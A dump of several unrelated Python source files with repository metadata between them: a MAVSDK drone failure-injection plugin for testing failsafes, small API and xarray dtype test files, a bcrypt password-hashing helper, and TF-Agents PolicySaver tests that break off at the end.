return failure_pb2.FAILURE_UNIT_SYSTEM_BATTERY
if self == FailureUnit.SYSTEM_MOTOR:
return failure_pb2.FAILURE_UNIT_SYSTEM_MOTOR
if self == FailureUnit.SYSTEM_SERVO:
return failure_pb2.FAILURE_UNIT_SYSTEM_SERVO
if self == FailureUnit.SYSTEM_AVOIDANCE:
return failure_pb2.FAILURE_UNIT_SYSTEM_AVOIDANCE
if self == FailureUnit.SYSTEM_RC_SIGNAL:
return failure_pb2.FAILURE_UNIT_SYSTEM_RC_SIGNAL
if self == FailureUnit.SYSTEM_MAVLINK_SIGNAL:
return failure_pb2.FAILURE_UNIT_SYSTEM_MAVLINK_SIGNAL
@staticmethod
def translate_from_rpc(rpc_enum_value):
""" Parses a gRPC response """
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_GYRO:
return FailureUnit.SENSOR_GYRO
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_ACCEL:
return FailureUnit.SENSOR_ACCEL
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_MAG:
return FailureUnit.SENSOR_MAG
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_BARO:
return FailureUnit.SENSOR_BARO
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_GPS:
return FailureUnit.SENSOR_GPS
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_OPTICAL_FLOW:
return FailureUnit.SENSOR_OPTICAL_FLOW
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_VIO:
return FailureUnit.SENSOR_VIO
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_DISTANCE_SENSOR:
return FailureUnit.SENSOR_DISTANCE_SENSOR
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SENSOR_AIRSPEED:
return FailureUnit.SENSOR_AIRSPEED
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SYSTEM_BATTERY:
return FailureUnit.SYSTEM_BATTERY
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SYSTEM_MOTOR:
return FailureUnit.SYSTEM_MOTOR
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SYSTEM_SERVO:
return FailureUnit.SYSTEM_SERVO
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SYSTEM_AVOIDANCE:
return FailureUnit.SYSTEM_AVOIDANCE
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SYSTEM_RC_SIGNAL:
return FailureUnit.SYSTEM_RC_SIGNAL
if rpc_enum_value == failure_pb2.FAILURE_UNIT_SYSTEM_MAVLINK_SIGNAL:
return FailureUnit.SYSTEM_MAVLINK_SIGNAL
def __str__(self):
return self.name
class FailureType(Enum):
"""
A failure type
Values
------
OK
No failure injected, used to reset a previous failure
OFF
Sets unit off, so completely non-responsive
STUCK
Unit is stuck e.g. keeps reporting the same value
GARBAGE
Unit is reporting complete garbage
WRONG
Unit is consistently wrong
SLOW
Unit is slow, so e.g. reporting at slower than expected rate
DELAYED
Data of unit is delayed in time
INTERMITTENT
Unit is sometimes working, sometimes not
"""
OK = 0
OFF = 1
STUCK = 2
GARBAGE = 3
WRONG = 4
SLOW = 5
DELAYED = 6
INTERMITTENT = 7
def translate_to_rpc(self):
if self == FailureType.OK:
return failure_pb2.FAILURE_TYPE_OK
if self == FailureType.OFF:
return failure_pb2.FAILURE_TYPE_OFF
if self == FailureType.STUCK:
return failure_pb2.FAILURE_TYPE_STUCK
if self == FailureType.GARBAGE:
return failure_pb2.FAILURE_TYPE_GARBAGE
if self == FailureType.WRONG:
return failure_pb2.FAILURE_TYPE_WRONG
if self == FailureType.SLOW:
return failure_pb2.FAILURE_TYPE_SLOW
if self == FailureType.DELAYED:
return failure_pb2.FAILURE_TYPE_DELAYED
if self == FailureType.INTERMITTENT:
return failure_pb2.FAILURE_TYPE_INTERMITTENT
@staticmethod
def translate_from_rpc(rpc_enum_value):
""" Parses a gRPC response """
if rpc_enum_value == failure_pb2.FAILURE_TYPE_OK:
return FailureType.OK
if rpc_enum_value == failure_pb2.FAILURE_TYPE_OFF:
return FailureType.OFF
if rpc_enum_value == failure_pb2.FAILURE_TYPE_STUCK:
return FailureType.STUCK
if rpc_enum_value == failure_pb2.FAILURE_TYPE_GARBAGE:
return FailureType.GARBAGE
if rpc_enum_value == failure_pb2.FAILURE_TYPE_WRONG:
return FailureType.WRONG
if rpc_enum_value == failure_pb2.FAILURE_TYPE_SLOW:
return FailureType.SLOW
if rpc_enum_value == failure_pb2.FAILURE_TYPE_DELAYED:
return FailureType.DELAYED
if rpc_enum_value == failure_pb2.FAILURE_TYPE_INTERMITTENT:
return FailureType.INTERMITTENT
def __str__(self):
return self.name
class FailureResult:
"""
Parameters
----------
result : Result
Result enum value
    result_str : str
Human-readable English string describing the result
"""
class Result(Enum):
"""
Possible results returned for failure requests.
Values
------
UNKNOWN
Unknown result
SUCCESS
Request succeeded
NO_SYSTEM
No system is connected
CONNECTION_ERROR
Connection error
UNSUPPORTED
Failure not supported
DENIED
Failure injection denied
DISABLED
Failure injection is disabled
TIMEOUT
Request timed out
"""
UNKNOWN = 0
SUCCESS = 1
NO_SYSTEM = 2
CONNECTION_ERROR = 3
UNSUPPORTED = 4
DENIED = 5
DISABLED = 6
TIMEOUT = 7
def translate_to_rpc(self):
if self == FailureResult.Result.UNKNOWN:
return failure_pb2.FailureResult.RESULT_UNKNOWN
if self == FailureResult.Result.SUCCESS:
return failure_pb2.FailureResult.RESULT_SUCCESS
if self == FailureResult.Result.NO_SYSTEM:
return failure_pb2.FailureResult.RESULT_NO_SYSTEM
if self == FailureResult.Result.CONNECTION_ERROR:
return failure_pb2.FailureResult.RESULT_CONNECTION_ERROR
if self == FailureResult.Result.UNSUPPORTED:
return failure_pb2.FailureResult.RESULT_UNSUPPORTED
if self == FailureResult.Result.DENIED:
return failure_pb2.FailureResult.RESULT_DENIED
if self == FailureResult.Result.DISABLED:
return failure_pb2.FailureResult.RESULT_DISABLED
if self == FailureResult.Result.TIMEOUT:
return failure_pb2.FailureResult.RESULT_TIMEOUT
@staticmethod
def translate_from_rpc(rpc_enum_value):
""" Parses a gRPC response """
if rpc_enum_value == failure_pb2.FailureResult.RESULT_UNKNOWN:
return FailureResult.Result.UNKNOWN
if rpc_enum_value == failure_pb2.FailureResult.RESULT_SUCCESS:
return FailureResult.Result.SUCCESS
if rpc_enum_value == failure_pb2.FailureResult.RESULT_NO_SYSTEM:
return FailureResult.Result.NO_SYSTEM
if rpc_enum_value == failure_pb2.FailureResult.RESULT_CONNECTION_ERROR:
return FailureResult.Result.CONNECTION_ERROR
if rpc_enum_value == failure_pb2.FailureResult.RESULT_UNSUPPORTED:
return FailureResult.Result.UNSUPPORTED
if rpc_enum_value == failure_pb2.FailureResult.RESULT_DENIED:
return FailureResult.Result.DENIED
if rpc_enum_value == failure_pb2.FailureResult.RESULT_DISABLED:
return FailureResult.Result.DISABLED
if rpc_enum_value == failure_pb2.FailureResult.RESULT_TIMEOUT:
return FailureResult.Result.TIMEOUT
def __str__(self):
return self.name
def __init__(
self,
result,
result_str):
""" Initializes the FailureResult object """
self.result = result
self.result_str = result_str
    def __eq__(self, to_compare):
""" Checks if two FailureResult are the same """
try:
# Try to compare - this likely fails when it is compared to a non
# FailureResult object
return \
(self.result == to_compare.result) and \
(self.result_str == to_compare.result_str)
except AttributeError:
return False
def __str__(self):
""" FailureResult in string representation """
struct_repr = ", ".join([
"result: " + str(self.result),
"result_str: " + str(self.result_str)
])
return f"FailureResult: [{struct_repr}]"
@staticmethod
def translate_from_rpc(rpcFailureResult):
""" Translates a gRPC struct to the SDK equivalent """
return FailureResult(
FailureResult.Result.translate_from_rpc(rpcFailureResult.result),
rpcFailureResult.result_str
)
def translate_to_rpc(self, rpcFailureResult):
""" Translates this SDK object into its gRPC equivalent """
rpcFailureResult.result = self.result.translate_to_rpc()
rpcFailureResult.result_str = self.result_str
class FailureError(Exception):
""" Raised when a FailureResult is a fail code """
def __init__(self, result, origin, *params):
self._result = result
self._origin = origin
self._params = params
def __str__(self):
return f"{self._result.result}: '{self._result.result_str}'; origin: {self._origin}; params: {self._params}"
class Failure(AsyncBase):
"""
Inject failures into system to test failsafes.
Generated by dcsdkgen - MAVSDK Failure API
"""
# Plugin name
name = "Failure"
def _setup_stub(self, channel):
""" Setups the api stub """
self._stub = failure_pb2_grpc.FailureServiceStub(channel)
def _extract_result(self, response):
""" Returns the response status and description """
return FailureResult.translate_from_rpc(response.failure_result)
async def inject(self, failure_unit, failure_type, instance):
"""
Injects a failure.
Parameters
----------
failure_unit : FailureUnit
The failure unit to send
failure_type : FailureType
The failure type to send
        instance : int
Instance to affect (0 for all)
Raises
------
FailureError
If the request fails. The error contains the reason for the failure.
"""
request = failure_pb2.InjectRequest()
request.failure_unit = failure_unit.translate_to_rpc()
request.failure_type = failure_type.translate_to_rpc()
request.instance = instance
response = await self._stub.Inject(request)
result = self._extract_result(response)
if result.result is not FailureResult.Result.SUCCESS:
raise FailureError(result, "inject()", failure_unit, failure_type, instance)
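# --- Usage sketch (editor's addition, not part of the generated module) ---
# Inject a GPS "off" failure on a connected vehicle. The System entry point,
# the connect() call and the SITL address below come from the wider
# MAVSDK-Python API and are assumptions here; FailureUnit and FailureType are
# the enums defined above. The autopilot may also need failure injection
# enabled on its side before it accepts the request.
import asyncio
from mavsdk import System


async def inject_gps_failure():
    drone = System()
    await drone.connect(system_address="udp://:14540")
    # instance 0 targets all instances of the unit (see the inject() docstring).
    await drone.failure.inject(FailureUnit.SENSOR_GPS, FailureType.OFF, 0)


if __name__ == "__main__":
    asyncio.run(inject_gps_failure())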
| 30.404762 | 116 | 0.628319 |
823e899aecf5881c99e791fd7099ceb1404c2f55
| 418 |
py
|
Python
|
tests/test_api.py
|
pinntech/pinn-python
|
d7d3f2d2a4cdc3eb01ae85a117c0e3d8bc1732bd
|
[
"MIT"
] | 2 |
2019-03-29T17:36:44.000Z
|
2021-11-20T00:05:04.000Z
|
tests/test_api.py
|
pinntech/pinn-python
|
d7d3f2d2a4cdc3eb01ae85a117c0e3d8bc1732bd
|
[
"MIT"
] | 4 |
2020-03-24T16:52:29.000Z
|
2021-06-01T23:36:18.000Z
|
tests/test_api.py
|
pinntech/pinn-python
|
d7d3f2d2a4cdc3eb01ae85a117c0e3d8bc1732bd
|
[
"MIT"
] | 1 |
2021-11-20T00:05:07.000Z
|
2021-11-20T00:05:07.000Z
|
"""
:copyright: (c) 2019 Pinn Technologies, Inc.
:license: MIT
"""
import pytest


def test_import():
    import pinn


def test_configuration_error():
    import pinn
    # Creating a user without a configured secret key must fail loudly;
    # pytest.raises makes the test fail if no exception is raised.
    with pytest.raises(pinn.errors.ConfigurationError):
        pinn.User.create()


def test_authentication_error():
    import pinn
    pinn.secret_key = 'foo'
    # An invalid secret key must be rejected with an AuthenticationError.
    with pytest.raises(pinn.errors.AuthenticationError):
        pinn.User.create()
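# Editor's sketch: pinn.secret_key is module-level state shared by the tests
# above, so resetting it after each test keeps them order-independent. Treating
# None as the "unset" value is an assumption about the pinn package.
@pytest.fixture(autouse=True)
def _reset_secret_key():
    import pinn
    yield
    pinn.secret_key = None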
| 16.076923 | 44 | 0.645933 |
1c942a1e6c80c09cc6afff40460be5ab93c827ed
| 3,472 |
py
|
Python
|
xarray/tests/test_dtypes.py
|
ianthomas23/xarray
|
aa1d1d19b822897399c8ed2cf346afbac71f45b3
|
[
"Apache-2.0"
] | null | null | null |
xarray/tests/test_dtypes.py
|
ianthomas23/xarray
|
aa1d1d19b822897399c8ed2cf346afbac71f45b3
|
[
"Apache-2.0"
] | null | null | null |
xarray/tests/test_dtypes.py
|
ianthomas23/xarray
|
aa1d1d19b822897399c8ed2cf346afbac71f45b3
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import annotations
import numpy as np
import pytest
from xarray.core import dtypes
@pytest.mark.parametrize(
"args, expected",
[
([bool], bool),
([bool, np.string_], np.object_),
([np.float32, np.float64], np.float64),
([np.float32, np.string_], np.object_),
([np.unicode_, np.int64], np.object_),
([np.unicode_, np.unicode_], np.unicode_),
([np.bytes_, np.unicode_], np.object_),
],
)
def test_result_type(args, expected):
actual = dtypes.result_type(*args)
assert actual == expected
def test_result_type_scalar():
actual = dtypes.result_type(np.arange(3, dtype=np.float32), np.nan)
assert actual == np.float32
def test_result_type_dask_array():
# verify it works without evaluating dask arrays
da = pytest.importorskip("dask.array")
dask = pytest.importorskip("dask")
def error():
raise RuntimeError
array = da.from_delayed(dask.delayed(error)(), (), np.float64)
with pytest.raises(RuntimeError):
array.compute()
actual = dtypes.result_type(array)
assert actual == np.float64
# note that this differs from the behavior for scalar numpy arrays, which
# would get promoted to float32
actual = dtypes.result_type(array, np.array([0.5, 1.0], dtype=np.float32))
assert actual == np.float64
@pytest.mark.parametrize("obj", [1.0, np.inf, "ab", 1.0 + 1.0j, True])
def test_inf(obj):
assert dtypes.INF > obj
assert dtypes.NINF < obj
@pytest.mark.parametrize(
"kind, expected",
[
("a", (np.dtype("O"), "nan")), # dtype('S')
("b", (np.float32, "nan")), # dtype('int8')
("B", (np.float32, "nan")), # dtype('uint8')
("c", (np.dtype("O"), "nan")), # dtype('S1')
("D", (np.complex128, "(nan+nanj)")), # dtype('complex128')
("d", (np.float64, "nan")), # dtype('float64')
("e", (np.float16, "nan")), # dtype('float16')
("F", (np.complex64, "(nan+nanj)")), # dtype('complex64')
("f", (np.float32, "nan")), # dtype('float32')
("h", (np.float32, "nan")), # dtype('int16')
("H", (np.float32, "nan")), # dtype('uint16')
("i", (np.float64, "nan")), # dtype('int32')
("I", (np.float64, "nan")), # dtype('uint32')
("l", (np.float64, "nan")), # dtype('int64')
("L", (np.float64, "nan")), # dtype('uint64')
("m", (np.timedelta64, "NaT")), # dtype('<m8')
("M", (np.datetime64, "NaT")), # dtype('<M8')
("O", (np.dtype("O"), "nan")), # dtype('O')
("p", (np.float64, "nan")), # dtype('int64')
("P", (np.float64, "nan")), # dtype('uint64')
("q", (np.float64, "nan")), # dtype('int64')
("Q", (np.float64, "nan")), # dtype('uint64')
("S", (np.dtype("O"), "nan")), # dtype('S')
("U", (np.dtype("O"), "nan")), # dtype('<U')
("V", (np.dtype("O"), "nan")), # dtype('V')
],
)
def test_maybe_promote(kind, expected):
# 'g': np.float128 is not tested : not available on all platforms
# 'G': np.complex256 is not tested : not available on all platforms
actual = dtypes.maybe_promote(np.dtype(kind))
assert actual[0] == expected[0]
assert str(actual[1]) == expected[1]
def test_nat_types_membership():
assert np.datetime64("NaT").dtype in dtypes.NAT_TYPES
assert np.timedelta64("NaT").dtype in dtypes.NAT_TYPES
assert np.float64 not in dtypes.NAT_TYPES
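# Quick illustration (editor's addition): the promotion rules exercised above,
# run directly. xarray.core.dtypes is an internal module, so this is a sketch
# of observed behavior rather than public-API guidance.
if __name__ == "__main__":
    promoted_dtype, fill_value = dtypes.maybe_promote(np.dtype("int16"))
    print(promoted_dtype, fill_value)  # a float dtype and NaN, per the 'h' case above
    print(dtypes.result_type(np.float32, np.string_))  # object, per the cases above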
| 34.376238 | 78 | 0.567396 |
7ee154247bb0b83037ecae140405579c83f06457
| 298 |
py
|
Python
|
backend/app/literature/hashing.py
|
alliance-genome/agr_literature_service_demo
|
48cd3a3797f96ef94e6d40d2c94e379bfc48914f
|
[
"MIT"
] | 1 |
2021-12-18T15:06:41.000Z
|
2021-12-18T15:06:41.000Z
|
res-page/hashing.py
|
beyondchan28/API-Server-1---Learning-Reource-Godot
|
bb1f00830cf0884bd8b369960e7bad54e90beee2
|
[
"MIT"
] | null | null | null |
res-page/hashing.py
|
beyondchan28/API-Server-1---Learning-Reource-Godot
|
bb1f00830cf0884bd8b369960e7bad54e90beee2
|
[
"MIT"
] | null | null | null |
from passlib.context import CryptContext
pwd_cxt = CryptContext(schemes=["bcrypt"], deprecated="auto")
class Hash():
    @staticmethod
    def bcrypt(password: str) -> str:
        # Hash a plain-text password for storage.
        return pwd_cxt.hash(password)

    @staticmethod
    def verify(hashed_password: str, plain_password: str) -> bool:
        # Check a candidate password against its stored bcrypt hash.
        return pwd_cxt.verify(plain_password, hashed_password)
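# Usage sketch (editor's addition): hash once at registration, verify at login;
# the literal passwords are placeholders.
if __name__ == "__main__":
    stored = Hash.bcrypt("s3cr3t-password")
    assert Hash.verify(stored, "s3cr3t-password")
    assert not Hash.verify(stored, "wrong-password")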
| 29.8 | 61 | 0.744966 |
5682c336cb33e1eee8dcb6f2e4ee73a6bb8d8456
| 17,610 |
py
|
Python
|
tf_agents/policies/policy_saver_test.py
|
kvzhao/agents
|
3bbf635a4f8f1f9255e0d7315b1163f84d96a4f7
|
[
"Apache-2.0"
] | 3 |
2019-10-02T13:55:14.000Z
|
2021-05-06T23:08:45.000Z
|
tf_agents/policies/policy_saver_test.py
|
nealwu/agents
|
27b9498689ea5b8f69fc77ada752e05e38192852
|
[
"Apache-2.0"
] | null | null | null |
tf_agents/policies/policy_saver_test.py
|
nealwu/agents
|
27b9498689ea5b8f69fc77ada752e05e38192852
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for PolicySaver."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl.testing import parameterized
import tensorflow as tf
from tf_agents.networks import q_network
from tf_agents.networks import q_rnn_network
from tf_agents.policies import policy_saver
from tf_agents.policies import q_policy
from tf_agents.specs import tensor_spec
from tf_agents.trajectories import time_step as ts
from tf_agents.utils import common
from tf_agents.utils import test_utils
class PolicySaverTest(test_utils.TestCase, parameterized.TestCase):
def setUp(self):
super(PolicySaverTest, self).setUp()
self._time_step_spec = ts.TimeStep(
step_type=tensor_spec.BoundedTensorSpec(
dtype=tf.int32, shape=(), name='st',
minimum=0, maximum=2),
reward=tensor_spec.BoundedTensorSpec(
dtype=tf.float32, shape=(), name='reward',
minimum=0.0, maximum=5.0),
discount=tensor_spec.BoundedTensorSpec(
dtype=tf.float32, shape=(), name='discount',
minimum=0.0, maximum=1.0),
observation=tensor_spec.BoundedTensorSpec(
dtype=tf.float32, shape=(4,), name='obs',
minimum=-10.0, maximum=10.0))
self._action_spec = tensor_spec.BoundedTensorSpec(
dtype=tf.int32, shape=(), minimum=0, maximum=10, name='act_0')
self._global_seed = 12345
tf.compat.v1.set_random_seed(self._global_seed)
def testUniqueSignatures(self):
network = q_network.QNetwork(
input_tensor_spec=self._time_step_spec.observation,
action_spec=self._action_spec)
policy = q_policy.QPolicy(
time_step_spec=self._time_step_spec,
action_spec=self._action_spec,
q_network=network)
saver = policy_saver.PolicySaver(policy, batch_size=None)
action_signature_names = [
s.name for s in saver._signatures['action'].input_signature
]
self.assertAllEqual(
['0/step_type', '0/reward', '0/discount', '0/observation'],
action_signature_names)
initial_state_signature_names = [
s.name for s in saver._signatures['get_initial_state'].input_signature
]
self.assertAllEqual(['batch_size'], initial_state_signature_names)
def testRenamedSignatures(self):
time_step_spec = self._time_step_spec._replace(
observation=tensor_spec.BoundedTensorSpec(
dtype=tf.float32, shape=(4,), minimum=-10.0, maximum=10.0))
network = q_network.QNetwork(
input_tensor_spec=time_step_spec.observation,
action_spec=self._action_spec)
policy = q_policy.QPolicy(
time_step_spec=time_step_spec,
action_spec=self._action_spec,
q_network=network)
saver = policy_saver.PolicySaver(policy, batch_size=None)
action_signature_names = [
s.name for s in saver._signatures['action'].input_signature
]
self.assertAllEqual(
['0/step_type', '0/reward', '0/discount', '0/observation'],
action_signature_names)
initial_state_signature_names = [
s.name for s in saver._signatures['get_initial_state'].input_signature
]
self.assertAllEqual(['batch_size'], initial_state_signature_names)
@parameterized.named_parameters(('NotSeededNoState', False, False),
('NotSeededWithState', False, True),
('SeededNoState', True, False),
('SeededWithState', True, True))
def testSaveAction(self, seeded, has_state):
with tf.compat.v1.Graph().as_default():
tf.compat.v1.set_random_seed(self._global_seed)
with tf.compat.v1.Session().as_default():
if has_state:
network = q_rnn_network.QRnnNetwork(
input_tensor_spec=self._time_step_spec.observation,
action_spec=self._action_spec)
else:
network = q_network.QNetwork(
input_tensor_spec=self._time_step_spec.observation,
action_spec=self._action_spec)
policy = q_policy.QPolicy(
time_step_spec=self._time_step_spec,
action_spec=self._action_spec,
q_network=network)
action_seed = 98723
batch_size = 3
action_inputs = tensor_spec.sample_spec_nest(
(self._time_step_spec, policy.policy_state_spec),
outer_dims=(batch_size,), seed=4)
action_input_values = self.evaluate(action_inputs)
action_input_tensors = tf.nest.map_structure(
tf.convert_to_tensor, action_input_values)
action_output = policy.action(*action_input_tensors, seed=action_seed)
self.evaluate(tf.compat.v1.global_variables_initializer())
action_output_dict = dict((
(spec.name, value) for (spec, value) in
zip(tf.nest.flatten(policy.policy_step_spec),
tf.nest.flatten(action_output))))
# Check output of the flattened signature call.
(action_output_value, action_output_dict) = self.evaluate(
(action_output, action_output_dict))
saver = policy_saver.PolicySaver(
policy, batch_size=None, use_nest_path_signatures=False,
seed=action_seed)
path = os.path.join(self.get_temp_dir(), 'save_model_action')
saver.save(path)
with tf.compat.v1.Graph().as_default():
tf.compat.v1.set_random_seed(self._global_seed)
with tf.compat.v1.Session().as_default():
reloaded = tf.compat.v2.saved_model.load(path)
self.assertIn('action', reloaded.signatures)
reloaded_action = reloaded.signatures['action']
self._compare_input_output_specs(
reloaded_action,
expected_input_specs=(self._time_step_spec,
policy.policy_state_spec),
expected_output_spec=policy.policy_step_spec,
batch_input=True)
# Reload action_input_values as tensors in the new graph.
action_input_tensors = tf.nest.map_structure(
tf.convert_to_tensor, action_input_values)
action_input_spec = (self._time_step_spec, policy.policy_state_spec)
function_action_input_dict = dict(
(spec.name, value) for (spec, value) in
zip(tf.nest.flatten(action_input_spec),
tf.nest.flatten(action_input_tensors)))
# NOTE(ebrevdo): The graph-level seeds for the policy and the reloaded
# model are equal, which in addition to seeding the call to action() and
# PolicySaver helps ensure equality of the output of action() in both
# cases.
self.assertEqual(reloaded_action.graph.seed, self._global_seed)
# The seed= argument for the SavedModel action call was given at
# creation of the PolicySaver.
# This is the flat-signature function.
reloaded_action_output_dict = reloaded_action(
**function_action_input_dict)
def match_dtype_shape(x, y, msg=None):
self.assertEqual(x.shape, y.shape, msg=msg)
self.assertEqual(x.dtype, y.dtype, msg=msg)
# This is the non-flat function.
if has_state:
reloaded_action_output = reloaded.action(*action_input_tensors)
else:
# Try both cases: one with an empty policy_state and one with no
# policy_state. Compare them.
# NOTE(ebrevdo): The first call to .action() must be stored in
# reloaded_action_output because this is the version being compared
# later against the true action_output and the values will change
# after the first call due to randomness.
reloaded_action_output = reloaded.action(*action_input_tensors)
reloaded_action_output_no_input_state = reloaded.action(
action_input_tensors[0])
# Even with a seed, multiple calls to action will get different
# values, so here we just check the signature matches.
tf.nest.map_structure(match_dtype_shape,
reloaded_action_output_no_input_state,
reloaded_action_output)
self.evaluate(tf.compat.v1.global_variables_initializer())
(reloaded_action_output_dict,
reloaded_action_output_value) = self.evaluate(
(reloaded_action_output_dict, reloaded_action_output))
self.assertAllEqual(
action_output_dict.keys(), reloaded_action_output_dict.keys())
for k in action_output_dict:
if seeded:
self.assertAllClose(
action_output_dict[k],
reloaded_action_output_dict[k],
msg='\nMismatched dict key: %s.' % k)
else:
match_dtype_shape(action_output_dict[k],
reloaded_action_output_dict[k],
msg='\nMismatch dict key: %s.' % k)
# With non-signature functions, we can check that passing a seed does
# the right thing the second time.
if seeded:
tf.nest.map_structure(
self.assertAllClose,
action_output_value,
reloaded_action_output_value)
else:
tf.nest.map_structure(
match_dtype_shape,
action_output_value,
reloaded_action_output_value)
def testSaveGetInitialState(self):
network = q_rnn_network.QRnnNetwork(
input_tensor_spec=self._time_step_spec.observation,
action_spec=self._action_spec)
policy = q_policy.QPolicy(
time_step_spec=self._time_step_spec,
action_spec=self._action_spec,
q_network=network)
saver_nobatch = policy_saver.PolicySaver(
policy, batch_size=None, use_nest_path_signatures=False)
path = os.path.join(self.get_temp_dir(), 'save_model_initial_state_nobatch')
saver_nobatch.save(path)
reloaded_nobatch = tf.compat.v2.saved_model.load(path)
self.assertIn('get_initial_state', reloaded_nobatch.signatures)
reloaded_get_initial_state = (
reloaded_nobatch.signatures['get_initial_state'])
self._compare_input_output_specs(
reloaded_get_initial_state,
expected_input_specs=(
tf.TensorSpec(dtype=tf.int32, shape=(), name='batch_size'),),
expected_output_spec=policy.policy_state_spec,
batch_input=False,
batch_size=None)
initial_state = policy.get_initial_state(batch_size=3)
initial_state = self.evaluate(initial_state)
reloaded_nobatch_initial_state = reloaded_nobatch.get_initial_state(
batch_size=3)
reloaded_nobatch_initial_state = self.evaluate(
reloaded_nobatch_initial_state)
tf.nest.map_structure(
self.assertAllClose, initial_state, reloaded_nobatch_initial_state)
saver_batch = policy_saver.PolicySaver(policy, batch_size=3,
use_nest_path_signatures=False)
path = os.path.join(self.get_temp_dir(), 'save_model_initial_state_batch')
saver_batch.save(path)
reloaded_batch = tf.compat.v2.saved_model.load(path)
self.assertIn('get_initial_state', reloaded_batch.signatures)
reloaded_get_initial_state = reloaded_batch.signatures['get_initial_state']
self._compare_input_output_specs(
reloaded_get_initial_state,
expected_input_specs=(),
expected_output_spec=policy.policy_state_spec,
batch_input=False,
batch_size=3)
reloaded_batch_initial_state = reloaded_batch.get_initial_state()
reloaded_batch_initial_state = self.evaluate(reloaded_batch_initial_state)
tf.nest.map_structure(
self.assertAllClose, initial_state, reloaded_batch_initial_state)
def testNoSpecMissingOrColliding(self):
spec_names = set()
flat_spec = tf.nest.flatten(self._time_step_spec)
missing_or_colliding = [
policy_saver._true_if_missing_or_collision(s, spec_names)
for s in flat_spec
]
self.assertFalse(any(missing_or_colliding))
def testTrueIfMissing(self):
time_step_spec = self._time_step_spec._replace(
observation=tensor_spec.BoundedTensorSpec(
dtype=tf.float32, shape=(4,), minimum=-10.0, maximum=10.0))
spec_names = set()
flat_spec = tf.nest.flatten(time_step_spec)
missing_or_colliding = [
policy_saver._true_if_missing_or_collision(s, spec_names)
for s in flat_spec
]
self.assertTrue(any(missing_or_colliding))
def testTrueIfCollision(self):
time_step_spec = self._time_step_spec._replace(
observation=tensor_spec.BoundedTensorSpec(
dtype=tf.float32,
shape=(4,),
name='st',
minimum=-10.0,
maximum=10.0))
spec_names = set()
flat_spec = tf.nest.flatten(time_step_spec)
missing_or_colliding = [
policy_saver._true_if_missing_or_collision(s, spec_names)
for s in flat_spec
]
self.assertTrue(any(missing_or_colliding))
def testRenameSpecWithNestPaths(self):
time_step_spec = self._time_step_spec._replace(observation=[
tensor_spec.TensorSpec(
dtype=tf.float32,
shape=(4,),
name='obs1',
),
tensor_spec.TensorSpec(
dtype=tf.float32,
shape=(4,),
name='obs1',
)
])
renamed_spec = policy_saver._rename_spec_with_nest_paths(time_step_spec)
new_names = [s.name for s in tf.nest.flatten(renamed_spec)]
self.assertAllEqual(
['step_type', 'reward', 'discount', 'observation/0', 'observation/1'],
new_names)
def testTrainStepSaved(self):
# We need to use one default session so that self.evaluate and the
# SavedModel loader share the same session.
with tf.compat.v1.Session().as_default():
network = q_network.QNetwork(
input_tensor_spec=self._time_step_spec.observation,
action_spec=self._action_spec)
policy = q_policy.QPolicy(
time_step_spec=self._time_step_spec,
action_spec=self._action_spec,
q_network=network)
self.evaluate(tf.compat.v1.initializers.variables(policy.variables()))
train_step = common.create_variable('train_step', initial_value=7)
self.evaluate(tf.compat.v1.initializers.variables([train_step]))
saver = policy_saver.PolicySaver(
policy, batch_size=None, train_step=train_step)
path = os.path.join(self.get_temp_dir(), 'save_model')
saver.save(path)
reloaded = tf.compat.v2.saved_model.load(path)
self.assertIn('get_train_step', reloaded.signatures)
self.evaluate(tf.compat.v1.global_variables_initializer())
train_step_value = self.evaluate(reloaded.train_step())
self.assertEqual(7, train_step_value)
train_step = train_step.assign_add(3)
self.evaluate(train_step)
saver.save(path)
reloaded = tf.compat.v2.saved_model.load(path)
self.evaluate(tf.compat.v1.global_variables_initializer())
train_step_value = self.evaluate(reloaded.train_step())
self.assertEqual(10, train_step_value)
def testTrainStepNotSaved(self):
network = q_network.QNetwork(
input_tensor_spec=self._time_step_spec.observation,
action_spec=self._action_spec)
policy = q_policy.QPolicy(
time_step_spec=self._time_step_spec,
action_spec=self._action_spec,
q_network=network)
saver = policy_saver.PolicySaver(policy, batch_size=None)
path = os.path.join(self.get_temp_dir(), 'save_model')
saver.save(path)
reloaded = tf.compat.v2.saved_model.load(path)
self.assertIn('get_train_step', reloaded.signatures)
train_step_value = self.evaluate(reloaded.train_step())
self.assertEqual(-1, train_step_value)
def _compare_input_output_specs(self,
function,
expected_input_specs,
expected_output_spec,
batch_input,
batch_size=None):
args, kwargs = function.structured_input_signature
self.assertFalse(args)
def expected_spec(spec, include_batch_dimension):
if include_batch_dimension:
return tf.TensorSpec(
dtype=spec.dtype,
shape=tf.TensorShape([batch_size]).concatenate(spec.shape),
name=spec.name)
else:
return spec
expected_input_spec_dict = dict(
(spec.name, expected_spec(spec, include_batch_dimension=batch_input))
for spec in tf.nest.flatten(expected_input_specs))
expected_output_spec_dict = dict(
(spec.name, expected_spec(spec, include_batch_dimension=True))
for spec in tf.nest.flatten(expected_output_spec))
self.assertEqual(kwargs, expected_input_spec_dict)
self.assertEqual(function.structured_outputs, expected_output_spec_dict)
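# Editor's sketch (not a test case): the non-test shape of what the cases above
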